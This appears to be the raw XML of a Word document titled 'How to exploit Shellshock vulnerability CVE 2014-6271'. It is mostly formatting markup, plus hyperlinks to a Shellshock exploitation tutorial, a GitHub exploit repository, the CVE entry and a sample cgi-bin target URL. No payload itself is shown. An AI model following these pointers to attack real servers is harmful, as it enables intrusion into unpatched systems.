                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="69175809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16071985">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1206068672">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1576550960">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="13091694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89519729">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1579024505">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1252929951">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="67935705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546605198">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1450205630">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="573782387">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="1835148333">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="455026486">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="455297641">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="84421616">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="1044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024">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="593123818">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1595942711">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="14878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166">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="800919405">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="14830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6252">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="300"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
                <w:bottom w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:right w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="223026268">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="855777559">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="693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458">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="300"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
                <w:bottom w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:right w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="357319755">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1543832974">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="13955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7593">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="445657665">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1164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9173">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="300"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
                <w:bottom w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:right w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1710563757">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="240"/>
              <w:marBottom w:val="240"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="15" w:color="F5F5F5"/>
                <w:left w:val="single" w:sz="6" w:space="15" w:color="F5F5F5"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="F5F5F5"/>
                <w:right w:val="single" w:sz="6" w:space="15" w:color="F5F5F5"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="904874022">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="90"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1217736861">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1549369158">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="8125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3838">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="455106996">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="721557790">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1874612822">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="927271361">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="150"/>
              <w:marBottom w:val="300"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:left w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
                <w:bottom w:val="single" w:sz="6" w:space="6" w:color="EEEEEE"/>
                <w:right w:val="single" w:sz="6" w:space="2" w:color="EEEEEE"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="889414340">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1005404456">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1341470036">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="9316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581">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1767769072">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="732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sxcq/exploit-CVE-2014-6271" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neoslab.com/2018/07/12/how-to-exploit-shellshock-vulnerability-cve-2014-627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92.168.1.1/filename;" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neoslab.com/2018/07/12/how-to-exploit-shellshock-vulnerability-cve-2014-627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ve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neoslab.com/2018/07/12/how-to-exploit-shellshock-vulnerability-cve-2014-6271/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neoslab.com/2018/07/12/how-to-exploit-shellshock-vulnerability-cve-2014-6271/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neoslab.com/2018/07/12/how-to-exploit-shellshock-vulnerability-cve-2014-6271/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://neoslab.com/2019/01/18/143/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/cgi-bin/wspd_cgi.sh/login.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/opsdisk/pagod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1925</Words>
  <Characters>10973</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 TO EXPLOIT SHELLSHOCK VULNERABILITY CVE 2014-6271</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>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2019-01-29T04:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-29T04:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>